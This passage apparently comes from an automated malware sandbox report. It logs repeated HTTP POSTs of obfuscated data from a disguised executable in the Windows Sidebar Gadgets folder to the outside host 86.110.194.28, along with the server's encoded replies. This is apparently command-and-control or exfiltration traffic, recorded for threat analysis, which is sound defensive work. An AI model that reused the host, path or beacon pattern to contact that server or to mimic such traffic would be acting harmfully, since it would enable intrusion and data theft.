                                                                                                                                                                  Data Ascii: ^Q^PX[P\T[YZ[^WR_QZ^RVPE_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&D(X)\":8R2Z0C)6^$9]&?5V 4"#(Y3,E'#<9#Y'$X.
                                                                                                                                                                  Jan 3, 2025 09:08:24.448956013 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:24.581724882 CET207INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:24 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  73192.168.2.44997086.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:24.666712999 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2152
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  74192.168.2.44997186.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:24.707673073 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:25.066873074 CET2576OUTData Raw: 5e 51 5e 5e 58 58 50 5d 54 5b 59 5a 5b 5f 57 5a 5f 5c 5a 55 52 56 50 45 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: ^Q^^XXP]T[YZ[_WZ_\ZURVPE_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&<*":$1<*>X3B)%?26$)W7<09#'(#Y'$X.
                                                                                                                                                                  Jan 3, 2025 09:08:25.422988892 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:25.554112911 CET207INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:25 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  75192.168.2.44997886.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:26.058409929 CET352OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Jan 3, 2025 09:08:26.410731077 CET2576OUTData Raw: 5e 56 5e 59 58 57 55 5c 54 5b 59 5a 5b 5e 57 59 5f 50 5a 5a 52 5c 50 43 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: ^V^YXWU\T[YZ[^WY_PZZR\PC_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%)>&6*(W1#=;>3=%<* 44(')<3#+#Y'$X.
                                                                                                                                                                  Jan 3, 2025 09:08:26.753954887 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:26.885750055 CET151INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:26 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  76192.168.2.44998886.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:27.003273010 CET352OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Jan 3, 2025 09:08:27.348124981 CET2576OUTData Raw: 5b 56 5e 50 58 5a 55 5a 54 5b 59 5a 5b 5e 57 5b 5f 52 5a 54 52 52 50 40 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [V^PXZUZT[YZ[^W[_RZTRRP@_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&D<>6)#&8)(1%$625Q!'5#($]'*;0$U?#Y'$X.
                                                                                                                                                                  Jan 3, 2025 09:08:27.706213951 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:27.837898970 CET151INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:27 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  77192.168.2.44999586.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:27.961170912 CET352OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Jan 3, 2025 09:08:28.316889048 CET2576OUTData Raw: 5b 57 5e 5f 5d 59 50 5b 54 5b 59 5a 5b 56 57 5b 5f 53 5a 55 52 52 50 41 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [W^_]YP[T[YZ[VW[_SZURRPA_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&<16'2<;=%09\%=S!7<3 3(T<9#Y'$X.%
                                                                                                                                                                  Jan 3, 2025 09:08:28.646914005 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:28.773509979 CET151INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:28 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  78192.168.2.44999786.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:29.037929058 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:29.394984961 CET2576OUTData Raw: 5b 54 5e 50 58 58 50 51 54 5b 59 5a 5b 52 57 5e 5f 52 5a 5a 52 57 50 45 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [T^PXXPQT[YZ[RW^_RZZRWPE_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&(#) W1? A=;_$B=Z2)V $)V!8[$9;'/V()#Y'$X.5


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  79192.168.2.45000286.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:29.713927031 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2164
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:30.066910028 CET2164OUTData Raw: 5e 51 5b 5a 58 57 55 5a 54 5b 59 5a 5b 54 57 5c 5f 54 5a 5f 52 53 50 49 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: ^Q[ZXWUZT[YZ[TW\_TZ_RSPI_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&B?>16$%,/=;"X$4:&/26B=78$X'D&?0W?9#Y'$X.-
                                                                                                                                                                  Jan 3, 2025 09:08:30.420988083 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:30.552973032 CET380INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:30 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                  Content-Length: 152
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 0d 1d 27 02 25 28 39 03 28 3f 3f 13 25 55 35 11 21 1e 0a 15 2e 20 32 45 22 2c 21 1c 31 3b 0e 50 3c 2d 36 08 28 33 39 50 23 3d 21 1f 2b 30 28 5d 03 10 39 5a 3d 2e 2c 04 2a 10 07 5e 2d 0e 2f 5a 33 51 2b 00 29 1d 04 09 26 2f 29 0a 22 2d 27 53 3d 23 3e 00 30 05 0e 5f 2b 20 37 5a 25 3d 20 54 0b 17 24 09 33 0e 01 58 26 5e 26 03 29 37 2b 01 30 3a 3a 0b 21 2c 32 1b 20 29 2f 03 2f 1e 26 0d 30 06 0f 54 2a 2d 37 55 32 3a 0f 01 27 11 2e 5c 23 0f 28 55 0d 34 57 50
                                                                                                                                                                  Data Ascii: '%(9(??%U5!. 2E",!1;P<-6(39P#=!+0(]9Z=.,*^-/Z3Q+)&/)"-'S=#>0_+ 7Z%= T$3X&^&)7+0::!,2 )//&0T*-7U2:'.\#(U4WP


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  80192.168.2.45000886.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:29.835786104 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:30.191869974 CET2576OUTData Raw: 5b 52 5e 5c 58 5d 50 51 54 5b 59 5a 5b 52 57 5b 5f 52 5a 5f 52 53 50 49 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [R^\X]PQT[YZ[RW[_RZ_RSPI_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&?1\"9#1'="^$B9X&<&5'9Q ?'',$U?#Y'$X.5
                                                                                                                                                                  Jan 3, 2025 09:08:30.512769938 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:30.642127037 CET207INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:30 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  81192.168.2.45001486.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:30.790406942 CET352OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Jan 3, 2025 09:08:31.149127007 CET2576OUTData Raw: 5b 57 5e 5f 58 57 50 5e 54 5b 59 5a 5b 5f 57 5e 5f 54 5a 5d 52 5c 50 40 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [W^_XWP^T[YZ[_W^_TZ]R\P@_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%+X*59 U2<>;3%]',66"78Z$@0?+?#Y'$X.
                                                                                                                                                                  Jan 3, 2025 09:08:31.489546061 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:31.624754906 CET151INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:31 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  82192.168.2.45001886.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:31.899090052 CET352OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Jan 3, 2025 09:08:32.254656076 CET2576OUTData Raw: 5e 51 5e 51 58 58 50 59 54 5b 59 5a 5b 51 57 5d 5f 56 5a 5d 52 57 50 46 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: ^Q^QXXPYT[YZ[QW]_VZ]RWPF_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%+5_"(2?<A(;504:2<= 4)V!; '*40?W+9#Y'$X.9
                                                                                                                                                                  Jan 3, 2025 09:08:32.596971989 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:32.727794886 CET151INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:32 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  83192.168.2.45002786.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:32.851108074 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:33.207489967 CET2576OUTData Raw: 5b 52 5e 5b 58 5a 50 59 54 5b 59 5a 5b 56 57 53 5f 5c 5a 5f 52 55 50 43 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [R^[XZPYT[YZ[VWS_\Z_RUPC_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%?]"%E*]1$%2<=S57% $Y3:<@'8S+#Y'$X.%
                                                                                                                                                                  Jan 3, 2025 09:08:33.543397903 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:33.681271076 CET207INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:33 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  84192.168.2.45003386.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:33.802814960 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:34.167138100 CET2576OUTData Raw: 5b 5d 5e 5d 5d 5d 50 5e 54 5b 59 5a 5b 52 57 5f 5f 55 5a 58 52 57 50 40 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: []^]]]P^T[YZ[RW__UZXRWP@_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%<--^") R&(+._''9&?9"P47$*8C$(?#Y'$X.5
                                                                                                                                                                  Jan 3, 2025 09:08:34.507401943 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:34.642859936 CET207INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:34 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  85192.168.2.45003986.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
